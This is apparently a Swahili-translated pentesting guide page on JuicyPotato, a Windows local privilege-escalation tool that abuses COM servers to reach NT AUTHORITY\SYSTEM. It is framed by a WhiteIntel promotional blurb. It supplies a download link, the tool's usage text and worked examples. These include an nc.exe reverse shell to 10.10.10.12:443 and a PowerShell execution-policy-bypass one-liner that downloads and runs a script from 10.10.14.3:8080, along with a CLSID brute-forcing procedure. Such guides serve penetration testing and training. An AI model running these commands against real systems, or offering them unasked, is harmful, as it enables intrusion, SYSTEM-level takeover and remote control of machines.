WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao bure hapa:

Juicy Potato (kutumia mamlaka ya dhahabu)

To leo tamu la RottenPotatoNG, na tone la maji, yaani zana nyingine ya Kupandisha Mamlaka ya Kienyeji, kutoka kwa Akaunti za Huduma za Windows hadi NT AUTHORITY\SYSTEM

Unaweza kupakua juicypotato kutoka https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Muhtasari

Kutoka kwa Soma juicypotato:

RottenPotatoNG na toleo lake linatumia mnyororo wa kupandisha mamlaka kulingana na BITS huduma ikiwa na msikilizaji wa MiTM kwenye 127.0.0.1:6666 na unapokuwa na mamlaka ya SeImpersonate au SeAssignPrimaryToken. Wakati wa ukaguzi wa ujenzi wa Windows tuligundua usanidi ambapo BITS ulizimwa kwa makusudi na bandari 6666 ilichukuliwa.

Tuliamua kuwezesha RottenPotatoNG: Sema habari kwa Juicy Potato.

Kwa nadharia, angalia Rotten Potato - Kupandisha Mamlaka kutoka kwa Akaunti za Huduma hadi SYSTEM na fuata mnyororo wa viungo na marejeo.

Tuligundua kwamba, zaidi ya BITS kuna seva za COM kadhaa tunaweza kutumia vibaya. Wanahitaji tu:

1. iweze kuanzishwa na mtumiaji wa sasa, kawaida "mtumiaji wa huduma" ambaye ana mamlaka ya udanganyifu

2. tekeleza kiolesura cha IMarshal

3. kufanya kazi kama mtumiaji aliyeinuliwa (SYSTEM, Msimamizi, …)

Baada ya majaribio tulipata na kujaribu orodha ndefu ya CLSID's za kuvutia kwenye toleo kadhaa za Windows.

Maelezo ya Juicy

JuicyPotato inakuruhusu:

• Lengo la CLSID chagua CLSID yoyote unayotaka. Hapa unaweza kupata orodha iliyopangwa kulingana na OS.

• Bandari ya Kusikiliza COM fafanua bandari ya kusikiliza COM unayopendelea (badala ya 6666 iliyowekwa kimakosa)

• Anwani ya IP ya Kusikiliza COM funga seva kwenye IP yoyote

• Hali ya Uumbaji wa Mchakato kulingana na mamlaka ya mtumiaji aliyejifanya unaweza kuchagua kutoka:

• CreateProcessWithToken (inahitaji SeImpersonate)

• CreateProcessAsUser (inahitaji SeAssignPrimaryToken)

• zote mbili

• Mchakato wa Kuzindua zindua faili inayoweza kutekelezwa au script ikiwa unyanyasaji unafanikiwa

• Hoja ya Mchakato customize vigezo vya mchakato uliozinduliwa

• Anwani ya Seva ya RPC kwa njia ya siri unaweza kuthibitisha kwa seva ya RPC ya nje

• Bandari ya Seva ya RPC inayofaa ikiwa unataka kuthibitisha kwa seva ya nje na firewall inazuia bandari 135…

• Hali ya MAJARIBIO hasa kwa madhumuni ya majaribio, yaani kujaribu CLSIDs. Inaunda DCOM na kuchapisha mtumiaji wa token. Angalia hapa kwa majaribio

Matumizi

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Mawazo ya mwisho

Kutoka kwa Mwongozo wa juicy-potato:

Ikiwa mtumiaji ana ruhusa za SeImpersonate au SeAssignPrimaryToken basi wewe ni SYSTEM.

Ni karibu haiwezekani kuzuia matumizi mabaya ya seva zote hizi za COM. Unaweza kufikiria kuhusu kubadilisha ruhusa za vitu hivi kupitia DCOMCNFG lakini kila la heri, hii itakuwa changamoto.

Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendeshwa chini ya akaunti za * SERVICE. Kusitisha DCOM bila shaka kungezuia unyanyasaji huu lakini inaweza kuwa na athari kubwa kwa OS inayohusika.

Kutoka: http://ohpe.it/juicy-potato/

Mifano

Tahadhari: Tembelea ukurasa huu kwa orodha ya CLSIDs za kujaribu.

Pata kabibi ya nyuma ya nc.exe

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell rev

Powershell rev

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Anzisha CMD mpya (ikiwa una ufikiaji wa RDP)

Matatizo ya CLSID

Maranyingi, CLSID ya msingi ambayo JuicyPotato inatumia haifanyi kazi na shambulio linashindwa. Kawaida, inachukua majaribio mengi kupata CLSID inayofanya kazi. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji fulani, unapaswa kutembelea ukurasa huu:

Kuangalia CLSIDs

Kwanza, utahitaji programu za kutekeleza zaidi ya juicypotato.exe.

Pakua Join-Object.ps1 na upakie kwenye kikao chako cha PS, na pakua na tekeleza GetCLSID.ps1. Skripti hiyo itaunda orodha ya CLSIDs inayoweza kujaribiwa.

Kisha pakua test_clsid.bat (badilisha njia ya orodha ya CLSID na kwa kutekelezeka kwa juicypotato) na tekeleza. Itaanza kujaribu kila CLSID, na wakati nambari ya bandari inabadilika, itamaanisha kwamba CLSID imefanya kazi.

Angalia CLSIDs zinazofanya kazi kwa kutumia parameter -c

Marejeo

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao kwa bure kwa: